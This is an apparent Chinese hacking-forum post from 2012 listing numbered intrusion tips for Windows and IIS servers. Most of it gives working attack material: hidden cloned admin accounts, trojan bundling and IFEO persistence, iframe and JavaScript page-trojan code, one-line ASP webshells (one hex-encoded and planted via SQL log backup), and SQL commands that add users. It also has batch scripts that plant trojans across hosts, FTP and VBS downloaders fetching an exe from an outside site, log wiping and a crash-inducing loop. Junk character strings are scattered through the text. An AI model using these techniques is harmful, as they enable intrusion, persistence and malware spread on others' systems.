中国网络渗透测试联盟

标题: 一些笔记 [打印本页]

作者: admin    时间: 2012-9-15 14:51
标题: 一些笔记
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,+ Y4 {+ A( Z* u( u
cacls C:\windows\system32 /G hqw20:R
( x9 _" {6 N' B2 I6 R# h* Z& N1 Q1 g思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入  y. q7 A4 R& C& u
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
8 c% U( n3 j8 q" P* f2 \4 B% ~8 s! S, T5 W' `2 _$ g
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
0 X, o9 q* w  D$ Y; ~) O
* @5 n+ b6 A4 L+ F# `$ l1 Q4 X* ~5 O3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。8 V. b2 Q: n# X. E0 l' B

" Z) S  \+ a4 Z3 n2 J, Y' |4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号8 z2 i& _3 k+ d: U( f+ D
7 Q% i1 c/ b0 p$ i2 c$ r. t; b' U
5、利用INF文件来修改注册表! f5 I# Z( ~. B% C6 Y
[Version]
6 l/ e- V" E8 l9 x9 K) Z/ [Signature="$CHICAGO$"
2 p2 g  y6 N) w( ]* V" m: m1 a[Defaultinstall]
; Z: P: E8 C" T/ S7 YaddREG=Ating6 u1 J2 K2 L9 m0 t7 P1 F
[Ating]( {2 C0 J8 f7 l! T
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
* N! ~1 U: R0 j7 ~' x以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:4 @- \# ~( j5 x/ ]- y/ w
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
/ h2 j" [, E$ k0 k- o0 ^4 z/ t其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
& N' d9 s+ u: ]* Y7 K- @8 b" p6 OHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
2 k( \# v, M* \HKEY_CURRENT_CONFIG 简写为 HKCC! f  J: f- ?) W  Y  b
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
  e) i6 p7 H6 M"1"这里代表是写入或删除注册表键值中的具体数据
: X: [- V7 X0 ]; F! ]
  B6 Q1 c9 ~7 o& Z+ g1 M# \: M8 Q6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,4 ?5 K1 I2 C; r( t$ k' L
多了一步就是在防火墙里添加个端口,然后导出其键值2 b4 M$ K. u8 ^$ i' |
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]1 T1 c- A5 o3 b& j' c

9 c0 A- T* _" L- K7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽5 N( ]3 ^# M: m
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
- C+ V" A$ J, `% n- n" u7 X, l
5 K& e, f. |1 P4 E) \& |9 ?# l8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。1 T2 b7 ?; a6 j% D0 ^

% v) x. G4 P- M9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
0 O" U! ?' f/ z. G' Q可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。+ j+ t* Z1 N% r1 h

2 ?1 L: v( j0 f10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
  N9 l( Y: Z6 s3 D! T9 g
- {" q4 @8 Y5 @' U" [" m  ?  X11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
& V9 H4 @4 _% u0 r" _用法:xsniff –pass –hide –log pass.txt; `5 D4 n7 ?! t4 R5 Q0 ^9 e$ ?4 O

7 [. ~2 [7 C: \% f: T9 q* ]/ D12、google搜索的艺术
5 ^4 d3 s0 @. S& P" g搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
: X+ g- S* @5 z) c0 I& `或“字符串的语法错误”可以找到很多sql注入漏洞。
1 O! X# C# u; Y& P& C  |; I, x' @2 a' @3 v: h& i
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。* o6 b3 l0 y. L2 F, j/ P3 r+ \1 Y

! r/ R) r) W, E- O14、cmd中输入 nc –vv –l –p 1987/ L4 E: K' g- U5 I2 V! I! c/ o( P
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃2 o* i7 C/ N2 o% w

" L# ?4 J3 [2 g/ I& Z6 {# O15、制作T++木马,先写个ating.hta文件,内容为; R. |4 \* t) ?4 E" w9 v7 i
<script language="VBScript">
% B2 R: \( |; s  X3 \set wshshell=createobject ("wscript.shell" )
" G  u0 A$ ]* G4 v, |7 I; Ia=wshshell.run("你马的名称",1)
8 T7 @4 x# k4 P6 N/ @window.close
/ q4 Z& B1 F: w1 N</script>4 I! k3 B/ p) i: ?& l5 ]
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
& T$ _. C  e' C0 p- a2 Y. P! ^' r) Z* Y
16、搜索栏里输入
0 Q- H% o- w9 Y/ H( l  E关键字%'and 1=1 and '%'='+ g0 S4 q- ?" [
关键字%'and 1=2 and '%'='5 T/ d: }$ q  D- T# f' }
比较不同处 可以作为注入的特征字符% e4 q6 t! S8 i8 `! Q% O
1 m$ M# r+ I7 p2 `/ i, N1 F
17、挂马代码<html>
. T& }/ d3 P( }! ~$ l<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
# o+ I3 g9 b% d& L! I8 Z6 S% B% `</html>
' @6 U5 M7 G+ \9 ]; Z. Y/ S" o7 F% x; O) F0 s/ f
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
) I# I$ t0 s4 b* o  b$ cnet localgroup administrators还是可以看出Guest是管理员来。
* e$ l; ^. z! ~5 m+ U' C( j7 u- P7 I
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
5 X9 ~3 G/ r7 A: z* F4 M用法: 安装: instsrv.exe 服务名称 路径8 H% G) l2 ?$ s% O5 T4 e' ~
卸载: instsrv.exe 服务名称 REMOVE
4 M3 l: F6 d  \0 E, `" M( l1 M- f
  \0 W6 Q8 t- R( {, ^% j) S' Z  Z3 Z; s% u  D- d
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
' T& l+ o, g( {$ O+ A( s* P2 G9 B不能注入时要第一时间想到%5c暴库。9 f7 l$ c# g) B$ |  e5 P
! g& r2 {# |7 L! d& m" J
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
1 x; o: V: P* U9 u' n. ]! x+ ]" {' d
2 a" \: g4 W0 }7 s23、缺少xp_cmdshell时
1 j) y% J4 P# r% O尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
7 {; G6 ?+ |; O0 l假如恢复不成功,可以尝试直接加用户(针对开3389的)
; \2 j/ O: f2 X! m! odeclare @o int
- T4 ^( o: I" D" F; b$ Wexec sp_oacreate 'wscript.shell',@o out
' v) V3 v0 g  B/ a8 {/ C2 pexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
' p! q# i9 P8 C( ]) p9 ~0 l2 s/ o2 j
24.批量种植木马.bat& l4 ~6 T+ o5 b) m+ K$ p4 Z
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
+ Y  n1 Y8 d: W+ ^) b0 S5 F2 Bfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间5 l8 W8 \; j2 l# T5 K
扫描地址.txt里每个主机名一行 用\\开头8 u0 I0 u+ D5 z3 d, Q+ l3 v) K

3 Q& g! x# h# ]  t+ O+ V4 d25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
6 a& @; S& g. Q. Z: C- V
9 n7 m# l. ?4 i& d- t! k4 g) A26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
% s" B" `2 v) g将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.  B+ h% f/ g3 R/ l8 Q/ N5 S% Z
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
+ }% f$ ]- \: d6 |$ C' e; ?
! b7 ^, S9 N/ O1 f" E+ q27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
* Z7 W. e8 C& `1 s$ X$ Q0 f1 C然后用#clear logg和#clear line vty *删除日志, ]3 W. V0 O, b% \
* a* d) d: X, \) ~1 D
28、电脑坏了省去重新安装系统的方法+ s2 ]/ X" M/ x3 T' b
纯dos下执行,: a/ `4 ]1 N2 P; x0 \3 [
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
+ a( U1 P$ _1 O9 V2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config0 _2 a: e3 Z6 b. r: ?' y! R
, X. d; X' n, ]$ |
29、解决TCP/IP筛选 在注册表里有三处,分别是:
2 {0 x+ K8 B( P* iHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip4 |6 O) k& e, v/ D& p5 n2 d
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip; C; ^2 S& f9 K/ w& `# {
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip3 V1 L! \* W( N$ o& D7 f
分别用
+ ?5 t; F1 Q7 u% Wregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip9 v& j! i& u. g& C# `
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
4 n1 V3 z# F5 w) T, b  p  Vregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
* x0 J: m# K! V  }$ h; t命令来导出注册表项, b% |  e! U) j1 M, v/ [7 }' ~
然后把三个文件里的EnableSecurityFilters"=dword:00000001,/ e. m* P$ d- k' V$ _
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用0 S3 s- ~' H/ q6 k0 D7 @% n+ x
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。$ l+ x; r' n0 |1 s

2 u& O6 d; \% @7 J30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U" Y( I- z+ c" Z( Z5 j
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3) F9 G" Q& f; \0 t: ?# u
" J. Y) t' G2 z2 G
31、全手工打造开3389工具+ w7 t) p* {5 C- e* ]3 ]/ Z
打开记事本,编辑内容如下:
9 I* O; q  C. b  p) _+ Eecho [Components] > c:\sql
  _( l. e7 Q4 \- Qecho TSEnable = on >> c:\sql
- |3 E( {! p3 O  p7 ?  g( fsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
4 W6 ]6 s% a: }1 {; q编辑好后存为BAT文件,上传至肉鸡,执行
) d3 k1 G& [. E- B3 b: X" m. \- G2 _; |) L2 R$ k# k5 h& M
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马5 p0 c1 @0 y( N5 X/ O/ [+ I
: V4 R7 B  P4 x  `  j) x2 y1 ?0 h4 l9 F* W
33、让服务器重启
9 H' G1 N( ^9 `6 R写个bat死循环:$ e& t( V5 k( ^$ v- h8 o2 {
@echo off. O) g6 q, J' x9 U* }
:loop13 \) i& b' u# A/ Z: s0 `
cls
7 Y8 B) Y/ Z) A, T4 V: jstart cmd.exe7 ~, r- {3 T' |
goto loop15 ?, G% |4 a9 l
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启- |- ]: f' h; l  E2 x

: n* S6 L" D7 ^, J/ s, k, M- g34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
" a" n6 o( {" w; B@echo off: N, V0 B. P2 d1 n
date /t >c:/3389.txt
1 S6 m" u* u0 R: qtime /t >>c:/3389.txt
1 I( y0 r# d1 ?& T! Sattrib +s +h c:/3389.bat: u* E  Y; f4 y; a. u& h" c9 d
attrib +s +h c:/3389.txt
0 O2 M) C( F  i; t$ Y2 Lnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt) ]" I) o4 x' P
并保存为3389.bat
& o" t1 ]8 r  h8 G' P打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
) b0 X& o1 `9 a: x7 Q1 Y0 e! x+ U& d! ~7 m6 e6 Q( X' N" n
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
: {8 q8 N) p7 [start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
: T) j! H) S! [3 Z' ~1 B+ U输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
1 l* W: X, |, z. ]- w
# U% Q4 y8 L' F' y  ~  U$ B36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
+ {0 p  ]$ ?# G. M$ o% ~echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址' I, {; P/ ~  z. Z+ w1 `' k. f& L
echo 你的FTP账号 >>c:\1.bat //输入账号4 v" m8 D6 c4 b8 Y8 `1 g
echo 你的FTP密码 >>c:\1.bat //输入密码
" E' u3 }. x5 `) o/ u2 K( e9 Techo bin >>c:\1.bat //登入
  w7 g4 r  n4 ]: U5 j- Becho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
/ `( |3 p% p3 Q. h" ?2 o3 oecho bye >>c:\1.bat //退出
1 l2 Y& \6 c) i然后执行ftp -s:c:\1.bat即可: p* L8 b" G9 b+ d! p' F" c

0 k1 M3 d5 e: `9 g, B; Y37、修改注册表开3389两法9 g: z$ T. k# d( `# W4 ~8 q9 r( z
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表4 O+ w0 M7 T' B7 P0 A7 a
echo Windows Registry Editor Version 5.00 >>3389.reg
7 I/ |$ C  P( \! y4 T2 lecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg0 b- f. w: L4 [/ V# \- x# v* t
echo "Enabled"="0" >>3389.reg0 J  v. n& Y% b0 H
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows" j4 f6 z% v. F
NT\CurrentVersion\Winlogon] >>3389.reg
: e# X3 n+ r5 ~echo "ShutdownWithoutLogon"="0" >>3389.reg
- Q5 o3 C$ x) z4 I" Oecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
4 }( L/ `% `/ F* H, ^6 ]+ B>>3389.reg6 d, @' a' s& E4 S0 l3 d4 T/ S
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg% R6 n4 P8 D7 |5 s2 ]
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]# D1 `9 n9 J; r, j- y0 C
>>3389.reg; M. J+ E9 M/ x2 u* B: i$ o/ H
echo "TSEnabled"=dword:00000001 >>3389.reg& r6 ~" y- r4 i; N( i8 i
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
3 {2 D1 x5 i4 W3 L6 `- g7 iecho "Start"=dword:00000002 >>3389.reg; a7 Z7 f7 k4 M9 m
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]7 \6 C+ _" q- a. V8 @% i
>>3389.reg" ?: L& u# q! x1 o
echo "Start"=dword:00000002 >>3389.reg
& U3 u7 O- R+ q2 \echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
  u; g8 o( G9 e2 Jecho "Hotkey"="1" >>3389.reg* d) }3 Z& P. i/ L% Q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal  }4 v4 {( u' \9 o; K
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
2 S6 U; K+ U  O) }2 m' z* vecho "PortNumber"=dword:00000D3D >>3389.reg
& \, b$ K5 H& P$ S$ L4 t: Recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
2 ?2 z. m; Q' i% o5 W) ~Server\WinStations\RDP-Tcp] >>3389.reg3 t- w0 S& H( P9 f) ~" V0 ]
echo "PortNumber"=dword:00000D3D >>3389.reg4 U7 _) _9 U" S# [1 K
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。, u! S; ?( f% H6 u3 k7 a$ U3 v
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
$ g2 K! _8 f! u; ~因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效: ~3 H$ z" C4 H) D5 e# Z5 Z
(2)winxp和win2003终端开启- a- @% t$ j& M' N6 T6 V; x8 Q
用以下ECHO代码写一个REG文件:1 A& b8 z% X( s% a; @
echo Windows Registry Editor Version 5.00>>3389.reg
- a7 u, W- I( v" @! f6 n# cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
# |5 C0 A& x) P0 BServer]>>3389.reg0 \2 u9 v+ k. m5 {" o* T7 J$ o
echo "fDenyTSConnections"=dword:00000000>>3389.reg! l/ a4 X: x+ `
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
0 i) Q' B& ^+ i; }0 `; gServer\Wds\rdpwd\Tds\tcp]>>3389.reg
$ R3 _) k1 D1 |) W- \# secho "PortNumber"=dword:00000d3d>>3389.reg
! k& ]" U. g7 }* d/ Necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
& X5 E" y4 @% ~& X) T' \+ p7 |Server\WinStations\RDP-Tcp]>>3389.reg$ B6 \5 `: K1 ~/ r# I1 K4 \
echo "PortNumber"=dword:00000d3d>>3389.reg
8 n' w2 B* a+ O2 H; s% _# W然后regedit /s 3389.reg del 3389.reg
, F; H9 q6 q# l7 s% TXP下不论开终端还是改终端端口都不需重启
8 h1 }. f/ y2 m7 q9 w6 [
& G& p% O' J1 A" C: h38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
8 x" O/ @( b  v3 c  {用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'/ d# X  T0 P. v. J1 d
* a  v! S; d+ C4 l) m/ Q! c% Z9 M
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!. \9 N' }: q, j  P2 _: {" C
(1)数据库文件名应复杂并要有特殊字符
$ W- T4 ]2 G, v8 |( j3 T(2)不要把数据库名称写在conn.asp里,要用ODBC数据源/ J: G/ S& H. h/ {* D; p
将conn.asp文档中的6 q- C' m& L% }
DBPath = Server.MapPath("数据库.mdb")0 |( ~, h" V) c" n* Z
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
0 g0 N: ?9 J; O/ t
5 H8 I/ ?* f. L; e& @( V/ t; f( r修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
. [- n9 q* `0 l(3)不放在WEB目录里
9 E7 ], L& \' G2 P" |( o- S% U5 E/ d) o  |$ i4 `
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉% n" j5 S2 h0 j% x( a: E
可以写两个bat文件
6 q- |, T& k; d3 s" R& ]@echo off$ C9 z6 }5 k6 y2 ^
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
! h" C4 C# k* z) r@del c:\winnt\system32\query.exe" R0 ]& U# d$ K, }# u
@del %SYSTEMROOT%\system32\dllcache\query.exe
( W% ^/ Z2 M, N- _. w2 w% O0 b@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
' |% B' G6 I1 N" I$ B7 y: F3 q
" ?9 s8 ]- \1 Z( M2 ^@echo off8 R# I$ u# ]  h
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
2 J6 q+ o0 \4 U/ `@del c:\winnt\system32\tsadmin.exe* `5 J7 O' y+ m% L8 |4 g
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex0 F" ^$ q. C$ }/ G/ `6 m

; E( Y2 M6 M: x1 O& ?$ x41、映射对方盘符: N+ n  q: Z; X7 X+ _
telnet到他的机器上,
/ A) E* h  v, Ynet share 查看有没有默认共享 如果没有,那么就接着运行0 Y  g2 D/ \0 J( t5 q
net share c$=c:! D6 }+ u. r8 P
net share现在有c$- u# {5 G$ \3 k% T4 f( x5 j/ l
在自己的机器上运行, \& T0 h1 G) q$ z
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
8 a" }& p* \, {5 I2 q
& k4 x* m1 P2 p' @3 D42、一些很有用的老知识
0 C) A9 E$ ]& e! c, V- atype c:\boot.ini ( 查看系统版本 )
7 L* D+ d  i2 Q# ?7 T( Wnet start (查看已经启动的服务)
2 ~! b& z, Q, ?query user ( 查看当前终端连接 )
  C# B2 c1 h! A8 Nnet user ( 查看当前用户 )
' X: `- b1 ]7 n- R/ F. Mnet user 用户 密码/add ( 建立账号 ); Y" Z0 U1 Z$ W  i$ G4 N: r9 Q
net localgroup administrators 用户 /add (提升某用户为管理员)
3 ]. B4 U7 H  ^/ k1 n8 y! ]ipconfig -all ( 查看IP什么的 )
. E" A4 k+ o" o" q7 f; u4 g; Q$ Fnetstat -an ( 查看当前网络状态 )! T6 y; [& j' q. {3 [4 T
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
' e: d- M0 J) s- a! l克隆时Administrator对应1F49 U0 }9 G% o( `
guest对应1F5
  I9 Y7 P5 S+ Ctsinternetuser对应3E8- K/ ?. {- v4 j& x# a
1 \5 A0 ]+ m% D8 |5 Y
43、如果对方没开3389,但是装了Remote Administrator Service% ?4 C2 A. A; }* c+ L- p
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
! I. N$ j) a9 U8 {8 |4 I4 D解释:用serv-u漏洞导入自己配制好的radmin的注册表信息6 l9 M* d6 k4 Y* U
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"6 x! A  n4 J7 A

4 }6 O$ }  Q8 s0 H! V7 I* [% s44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)0 j. A9 h3 M, k' e) l8 h7 ^
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
3 ^# Z: D5 e- s) h1 e# j/ f. ?! e& s3 m4 ^) `/ A
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
  n& \+ }5 I- O+ d1 v9 `* ~7 z  @. B4 Kecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
( l6 S1 g! }" D" i% \^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
/ p& ]  Z! d0 P5 n" ^% _/ RCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =! U3 S: |9 f2 B9 l! \( l
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs+ q: J  B6 k, B- ~3 ~" b
(这是完整的一句话,其中没有换行符)2 E* C* r: B% B6 w: D# ~! s1 q' y7 w; U
然后下载:
" q3 L3 O4 V# @; x; \6 v* Lcscript down.vbs http://www.hack520.org/hack.exe hack.exe+ u$ f- f5 Q  f/ K- V* A% h$ @
3 c; G; P4 w6 Q. D- }2 ?
46、一句话木马成功依赖于两个条件:
, z% q+ G: e) J; V$ q1、服务端没有禁止adodb.Stream或FSO组件
  G+ ?3 [. j" [! M2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。" O9 R6 S0 D9 R6 G- C: d* `

. S$ \# v) @9 G1 }+ X47、利用DB_OWNER权限进行手工备份一句话木马的代码:
) ]; m9 o) g. G( J( T4 V( j% e;alter database utsz set RECOVERY FULL--
3 }; M4 N5 R& o5 t" Z( C0 n' i;create table cmd (a image)--
, j" Z! \! F/ e$ e! l1 _& H;backup log utsz to disk = 'D:\cmd' with init--8 ^6 y7 T. P2 M7 z% W% i
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--5 r" o/ N$ z/ T2 D3 ^2 W8 Q/ o
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--. k7 W; q7 |3 u! D/ u) Y2 s. B
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
# c( X" e. e7 S1 }) U% W; D* u" }7 D/ T; u3 D' M1 U5 K6 `4 h
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
, |' }, z0 Q5 r2 H! y% ?# `7 b$ s
4 t# I: d0 P) B# ]1 L/ f) l; i$ G用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options1 E' _  e+ o0 U5 a' [
所有会话用 'all'。
1 o* g; @# A5 N2 M-s sessionid 列出会话的信息。! j; L. x: s& c; S' ~/ S
-k sessionid 终止会话。; l) ]! z2 A$ V! s& H8 N# `
-m sessionid 发送消息到会话。0 m8 r/ x- s3 z

+ P1 t* ^- Z& Z6 S% H( n/ `config 配置 telnet 服务器参数。, G6 o6 o$ G! n: ~, {- O! p
* R( E' Y8 r$ k+ q* {
common_options 为:: x1 e1 K5 J' H% F
-u user 指定要使用其凭据的用户; r  ~& V' X: [
-p password 用户密码
0 E5 B/ D! K8 o" N8 t  j, g6 a( y$ `' F2 i
config_options 为:$ h& k! D, ^) v, g) G8 |+ m
dom = domain 设定用户的默认域% J5 ]5 L  D) M
ctrlakeymap = yes|no 设定 ALT 键的映射
  `0 i+ r# }  E8 V8 B$ Gtimeout = hh:mm:ss 设定空闲会话超时值
7 ~) q, i( P! otimeoutactive = yes|no 启用空闲会话。) T- c( `. J) l% z+ u% E0 j
maxfail = attempts 设定断开前失败的登录企图数。
$ e9 B$ n$ `. E# ?maxconn = connections 设定最大连接数。, S% h9 z" ], w+ R2 `, K$ q. G
port = number 设定 telnet 端口。
7 V6 z5 U$ V; ?# l2 D4 v/ Csec = [+/-]NTLM [+/-]passwd8 r6 I: _) X2 n2 }( j
设定身份验证机构
+ ?) v; A( t* h6 c/ _) Kfname = file 指定审计文件名。
$ G! g7 `& c4 M( w8 G. F; wfsize = size 指定审计文件的最大尺寸(MB)。5 ~, Y# o+ I5 }# S5 b- t
mode = console|stream 指定操作模式。
& ]" H  s' h3 v# k- i6 B* Mauditlocation = eventlog|file|both
3 w  v+ [9 z2 I5 q3 @指定记录地点
% S5 ]/ {. ~- C9 `( A& Z. N8 w- zaudit = [+/-]user [+/-]fail [+/-]admin) U. F$ L; ]8 c. E6 K8 `' [

5 Z& f# h/ n5 H49、例如:在IE上访问:
! N$ y4 o& }  G% m7 u: i9 Iwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
* I6 G9 Z7 p# W# T4 v2 _9 p) mhack.txt里面的代码是:3 W/ `8 H' P0 ]9 R; B' Y; Z
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
& P  E. G$ H3 Y/ e把这个hack.txt发到你空间就可以了!
& v) u" U6 B  t( s; y# s这个可以利用来做网马哦!, ~" P0 \* J8 T5 T7 k4 C: M

& b) f  q0 C1 S+ x2 p0 Z" B50、autorun的病毒可以通过手动限制!
/ y6 A6 \5 f2 t2 Q& N; u1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!: A2 u+ x; A$ V* x- X- h
2,打开盘符用右键打开!切忌双击盘符~
; w% K' N- l. T7 b! J5 ~* a3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!5 h. [1 O  p, k& y7 |
+ J* q. O1 f/ m/ u2 H  L
51、log备份时的一句话木马:5 K0 L8 }3 T3 {5 ]: y
a).<%%25Execute(request("go"))%%25>5 |2 T2 M7 [7 v: y% p8 q4 y( t6 d" m
